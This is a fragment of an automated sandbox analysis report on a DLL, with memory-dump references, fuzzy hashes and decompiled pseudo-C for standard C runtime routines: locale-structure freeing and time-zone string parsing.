                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          • Opcode ID: c3b3a44a33e3dfe07a1a69b5db6e0a9dd8f9e9e3da1b76fad72fd456ee2bed9f
                          • Instruction ID: e6ba85e52a162438898bda3e61d71c4f65ccde87ac25c08451cec3332309e027
                          • Opcode Fuzzy Hash: c3b3a44a33e3dfe07a1a69b5db6e0a9dd8f9e9e3da1b76fad72fd456ee2bed9f
                          • Instruction Fuzzy Hash: B95158F022477F9BDBB045E84460BEF279B9B42305F38091AD8D1AB282D285DD0E8F53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2484BB, Relevance: .7, Instructions: 669COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: f524f73a5cf101e50335e1bc722b4f233ba36968530d99576619f8e1a0744a22
                          • Instruction ID: 09fbcbddc15850d5c15c256fbbcc58d611ef93f1c6185f237ceceb75ee90309a
                          • Opcode Fuzzy Hash: f524f73a5cf101e50335e1bc722b4f233ba36968530d99576619f8e1a0744a22
                          • Instruction Fuzzy Hash: 3D327F74E2010EDFDB0CCF98C991AAEB7B6FF85304F244168E94597309D731AA56CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2567D9, Relevance: .6, Instructions: 637COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 26f1272149449b7af9ad97af1d8525aaf45abb8a92a8d606b967ee3fe6bef159
                          • Instruction ID: 72ceaefb33fac22069d6d392c949135591c7e11d11218023bd56dcd873596d64
                          • Opcode Fuzzy Hash: 26f1272149449b7af9ad97af1d8525aaf45abb8a92a8d606b967ee3fe6bef159
                          • Instruction Fuzzy Hash: 26325721D79F164EDB235634C972325A25EAFB73C5F10D727F81AB5AA9EB29C0C38101
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E223E00, Relevance: .1, Instructions: 76COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                          • Instruction ID: a61828d941d93e4053065eadb59b3be0b6c6f47e138728706572f73e25406b53
                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                          • Instruction Fuzzy Hash: 71112EB764008B8FD28189EDC4BC6BBA397FFF9326728437AD1614B658D223914D9600
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E1E16BC, Relevance: .0, Instructions: 27COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: de327c7815a3b8948efe514a3961ad79ff2babd24348f1ac3403d3fac0d27517
                          • Instruction ID: 9da26caa93565a07a100f2643b27fc5b473e7a53dd75feed7f1fce75cd75777f
                          • Opcode Fuzzy Hash: de327c7815a3b8948efe514a3961ad79ff2babd24348f1ac3403d3fac0d27517
                          • Instruction Fuzzy Hash: 1CF01535700A45AFDB04CF58C954F2AB7E9FB0DA10F248669E826CBB91DB75E844CA50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25BF64, Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 410 6e25bf64-6e25bf78 411 6e25bfe6-6e25bfee 410->411 412 6e25bf7a-6e25bf7f 410->412 414 6e25c035-6e25c04d call 6e25c0d7 411->414 415 6e25bff0-6e25bff3 411->415 412->411 413 6e25bf81-6e25bf86 412->413 413->411 416 6e25bf88-6e25bf8b 413->416 424 6e25c050-6e25c057 414->424 415->414 418 6e25bff5-6e25c032 call 6e24cbd3 * 4 415->418 416->411 419 6e25bf8d-6e25bf95 416->419 418->414 422 6e25bf97-6e25bf9a 419->422 423 6e25bfaf-6e25bfb7 419->423 422->423 426 6e25bf9c-6e25bfae call 6e24cbd3 call 6e25c7cf 422->426 429 6e25bfd1-6e25bfe5 call 6e24cbd3 * 2 423->429 430 6e25bfb9-6e25bfbc 423->430 427 6e25c076-6e25c07a 424->427 428 6e25c059-6e25c05d 424->428 426->423 432 6e25c092-6e25c09e 427->432 433 6e25c07c-6e25c081 427->433 436 6e25c073 428->436 437 6e25c05f-6e25c062 428->437 429->411 430->429 438 6e25bfbe-6e25bfd0 call 6e24cbd3 call 6e25ccc3 430->438 432->424 443 6e25c0a0-6e25c0ad call 6e24cbd3 432->443 440 6e25c083-6e25c086 433->440 441 6e25c08f 433->441 436->427 437->436 445 6e25c064-6e25c072 call 6e24cbd3 * 2 437->445 438->429 440->441 450 6e25c088-6e25c08e call 6e24cbd3 440->450 441->432 445->436 450->441
                          C-Code - Quality: 100%
                          			E6E25BF64(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e2c50b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E24CBD3(_t46);
							E6E25C7CF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E24CBD3(_t47);
							E6E25CCC3( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E24CBD3( *((intOrPtr*)(_t74 + 0x7c)));
						E6E24CBD3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E25C0D7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e2c52b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E24CBD3(_t31);
							E6E24CBD3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E24CBD3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E24CBD3(_t74);
			}















                          0x6e25bf6c
                          0x6e25bf70
                          0x6e25bf78
                          0x6e25bf81
                          0x6e25bf86
                          0x6e25bf8d
                          0x6e25bf95
                          0x6e25bf9d
                          0x6e25bfa8
                          0x6e25bfae
                          0x6e25bfaf
                          0x6e25bfb7
                          0x6e25bfbf
                          0x6e25bfca
                          0x6e25bfd0
                          0x6e25bfd4
                          0x6e25bfdf
                          0x6e25bfe5
                          0x6e25bf86
                          0x6e25bfe6
                          0x6e25bfee
                          0x6e25c001
                          0x6e25c014
                          0x6e25c022
                          0x6e25c02d
                          0x6e25c032
                          0x6e25c03b
                          0x6e25c043
                          0x6e25c044
                          0x6e25c044
                          0x6e25c04a
                          0x6e25c04d
                          0x6e25c04d
                          0x6e25c050
                          0x6e25c057
                          0x6e25c059
                          0x6e25c05d
                          0x6e25c065
                          0x6e25c06c
                          0x6e25c072
                          0x6e25c073
                          0x6e25c073
                          0x6e25c07a
                          0x6e25c07c
                          0x6e25c081
                          0x6e25c089
                          0x6e25c08e
                          0x6e25c08f
                          0x6e25c08f
                          0x6e25c092
                          0x6e25c095
                          0x6e25c098
                          0x6e25c09b
                          0x6e25c09b
                          0x6e25c0ad

                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 6E25BFA8
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C7EC
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C7FE
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C810
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C822
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C834
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C846
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C858
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C86A
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C87C
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C88E
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8A0
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8B2
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8C4
                          • _free.LIBCMT ref: 6E25BF9D
                            • Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
                            • Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB
                          • _free.LIBCMT ref: 6E25BFBF
                          • _free.LIBCMT ref: 6E25BFD4
                          • _free.LIBCMT ref: 6E25BFDF
                          • _free.LIBCMT ref: 6E25C001
                          • _free.LIBCMT ref: 6E25C014
                          • _free.LIBCMT ref: 6E25C022
                          • _free.LIBCMT ref: 6E25C02D
                          • _free.LIBCMT ref: 6E25C065
                          • _free.LIBCMT ref: 6E25C06C
                          • _free.LIBCMT ref: 6E25C089
                          • _free.LIBCMT ref: 6E25C0A1
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          • Opcode ID: 9e2b707382a9bce83ac7c2478675cdbb2857b87fa4640b4bb6638e2bbf7300ad
                          • Instruction ID: 8e10108ec5c9639180e93905bc15030a070d53f974845a8b297362a1babc60cf
                          • Opcode Fuzzy Hash: 9e2b707382a9bce83ac7c2478675cdbb2857b87fa4640b4bb6638e2bbf7300ad
                          • Instruction Fuzzy Hash: 63319E3560430EDFFB648BB8D942B9673FBAF00B15F204829E069CB251EF75A9648B10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25877C, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370timeCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E6E25877C(void* __ebx, void* __edi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				void* _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t171 = __edi;
				_t65 = E6E25822B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6E258289( &_v8) != 0 || E6E258231( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E242188();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6E25822B();
					_t32 =  &_v52; // 0x6e272130
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6E258289(_t32);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6E242188();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6e2c506c; // 0x22cbda9b
						_v100 = _t74 ^ _t192;
						 *0x6e2c5384 =  *0x6e2c5384 | 0xffffffff;
						 *0x6e2c5378 =  *0x6e2c5378 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6e2c7a10 = 0;
						_t78 = E6E251216(0x6e272130, _t167, 0, __eflags,  &_v360,  &_v356, 0x100, 0x6e272130);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6E24F26D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6E251216(0x6e272130, _t167, 0, __eflags,  &_v280, _t184, _v276, 0x6e272130);
									__eflags = _t85;
									if(_t85 == 0) {
										E6E24CBD3(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6E24CBD3();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6E25877C(0x6e272130, _t172, __eflags);
							}
						}
						E6E24CBD3(_t183);
						__eflags = _v16 ^ _t192;
						return E6E21F8A5(_v16 ^ _t192, _t167, _t183);
					} else {
						_t89 = E6E258231( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6E25825D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6E24CBD3( *0x6e2c7a08);
								 *0x6e2c7a08 = 0;
								 *_t194 = 0x6e2c7a18;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6e2c7a18 * 0x3c;
									_t168 =  *0x6e2c7a6c; // 0x0
									_push(_t171);
									 *0x6e2c7a10 = 1;
									_v12 = _t150;
									__eflags =  *0x6e2c7a5e; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t168 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6e2c7ab2; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6e2c7ac0; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t168) * 0x3c;
										}
									}
									_t176 = E6E243CD0(0, _t168);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6e2c7a1c, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6e2c7a70, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6E258225()) = _v12;
								 *((intOrPtr*)(E6E258219())) = _v16;
								_t96 = E6E25821F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t169 =  *0x6e2c7a08; // 0x0
					_t178 = _a4;
					if(_t169 == 0) {
						L12:
						E6E24CBD3(_t169);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6e258b6d
						_t170 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t170 + 1; // 0x6e258b6e
						 *0x6e2c7a08 = E6E24F26D(_t154 - _t170, _t13);
						_t116 = E6E24CBD3(0);
						_t167 =  *0x6e2c7a08; // 0x0
						if(_t167 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6e258b6d
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6e258b6e
							_t119 = E6E24AB60(_t167, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E6E263B33(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6E24BFB3(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6E24BFB3(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6E24BFB3(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6E258225()) = _v8;
										_t128 = E6E258219();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6E263B33(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t169;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}





































































                          0x6e25877c
                          0x6e258786
                          0x6e25878b
                          0x6e25878f
                          0x6e258791
                          0x6e258799
                          0x6e2587a4
                          0x6e258944
                          0x6e258946
                          0x6e258947
                          0x6e258948
                          0x6e258949
                          0x6e25894a
                          0x6e25894b
                          0x6e258950
                          0x6e258954
                          0x6e258956
                          0x6e258959
                          0x6e258960
                          0x6e258964
                          0x6e258967
                          0x6e25896b
                          0x6e25896e
                          0x6e258971
                          0x6e258976
                          0x6e258977
                          0x6e258979
                          0x6e258aa1
                          0x6e258aa1
                          0x6e258aa2
                          0x6e258aa3
                          0x6e258aa4
                          0x6e258aa5
                          0x6e258aa6
                          0x6e258aab
                          0x6e258aae
                          0x6e258aaf
                          0x6e258ab7
                          0x6e258abe
                          0x6e258ac1
                          0x6e258ace
                          0x6e258ad5
                          0x6e258ad6
                          0x6e258ad7
                          0x6e258add
                          0x6e258aec
                          0x6e258af3
                          0x6e258afb
                          0x6e258afd
                          0x6e258b07
                          0x6e258b0a
                          0x6e258b17
                          0x6e258b1a
                          0x6e258b1c
                          0x6e258b35
                          0x6e258b3d
                          0x6e258b3f
                          0x6e258b45
                          0x6e258b4a
                          0x6e258b41
                          0x6e258b41
                          0x00000000
                          0x6e258b41
                          0x6e258b1e
                          0x6e258b1e
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b4c
                          0x6e258aff
                          0x6e258aff
                          0x6e258aff
                          0x6e258b59
                          0x6e258b5b
                          0x6e258b5d
                          0x6e258b5f
                          0x6e258b6f
                          0x6e258b6f
                          0x6e258b61
                          0x6e258b61
                          0x6e258b64
                          0x00000000
                          0x6e258b66
                          0x6e258b66
                          0x6e258b67
                          0x6e258b6c
                          0x6e258b64
                          0x6e258b75
                          0x6e258b80
                          0x6e258b8b
                          0x6e25897f
                          0x6e258983
                          0x6e258988
                          0x6e258989
                          0x6e25898b
                          0x00000000
                          0x6e258991
                          0x6e258995
                          0x6e25899a
                          0x6e25899b
                          0x6e25899d
                          0x00000000
                          0x6e2589a3
                          0x6e2589a9
                          0x6e2589ae
                          0x6e2589b4
                          0x6e2589bb
                          0x6e2589c1
                          0x6e2589c4
                          0x6e2589ca
                          0x6e2589d1
                          0x6e2589d7
                          0x6e2589db
                          0x6e2589e1
                          0x6e2589e4
                          0x6e2589eb
                          0x6e2589f0
                          0x6e2589f0
                          0x6e2589f2
                          0x6e2589f2
                          0x6e2589f5
                          0x6e2589fc
                          0x6e258a14
                          0x6e258a14
                          0x6e258a17
                          0x6e2589fe
                          0x6e2589fe
                          0x6e258a03
                          0x6e258a05
                          0x00000000
                          0x6e258a07
                          0x6e258a09
                          0x6e258a0f
                          0x6e258a0f
                          0x6e258a05
                          0x6e258a1f
                          0x6e258a33
                          0x6e258a39
                          0x6e258a3b
                          0x6e258a49
                          0x6e258a4b
                          0x6e258a3d
                          0x6e258a3d
                          0x6e258a40
                          0x00000000
                          0x6e258a42
                          0x6e258a44
                          0x6e258a44
                          0x6e258a40
                          0x6e258a60
                          0x6e258a67
                          0x6e258a69
                          0x6e258a78
                          0x6e258a7b
                          0x6e258a6b
                          0x6e258a6b
                          0x6e258a6e
                          0x00000000
                          0x6e258a70
                          0x6e258a73
                          0x6e258a73
                          0x6e258a6e
                          0x6e258a69
                          0x6e258a85
                          0x6e258a8f
                          0x6e258a94
                          0x6e258a99
                          0x6e258aa0
                          0x6e258aa0
                          0x6e25899d
                          0x6e25898b
                          0x6e2587bc
                          0x6e2587bc
                          0x6e2587c2
                          0x6e2587c7
                          0x6e2587fd
                          0x6e2587fe
                          0x6e258804
                          0x6e258806
                          0x6e258806
                          0x6e258809
                          0x6e258809
                          0x6e25880b
                          0x6e25880c
                          0x6e258812
                          0x6e25881d
                          0x6e258822
                          0x6e258827
                          0x6e258831
                          0x00000000
                          0x6e258837
                          0x6e258837
                          0x6e258839
                          0x6e25883a
                          0x6e25883a
                          0x6e25883d
                          0x6e25883d
                          0x6e25883f
                          0x6e258840
                          0x6e258847
                          0x6e25884c
                          0x6e258851
                          0x6e258856
                          0x6e25885e
                          0x6e25885f
                          0x6e258865
                          0x6e25886a
                          0x6e25886f
                          0x6e258875
                          0x6e25887a
                          0x6e25887b
                          0x6e25887e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25887e
                          0x6e258883
                          0x6e258884
                          0x6e258889
                          0x6e25888b
                          0x6e25888b
                          0x6e258893
                          0x6e258899
                          0x6e25889c
                          0x6e25889c
                          0x6e2588a0
                          0x00000000
                          0x00000000
                          0x6e2588aa
                          0x6e2588aa
                          0x6e2588ad
                          0x6e2588b0
                          0x6e2588b2
                          0x6e2588c0
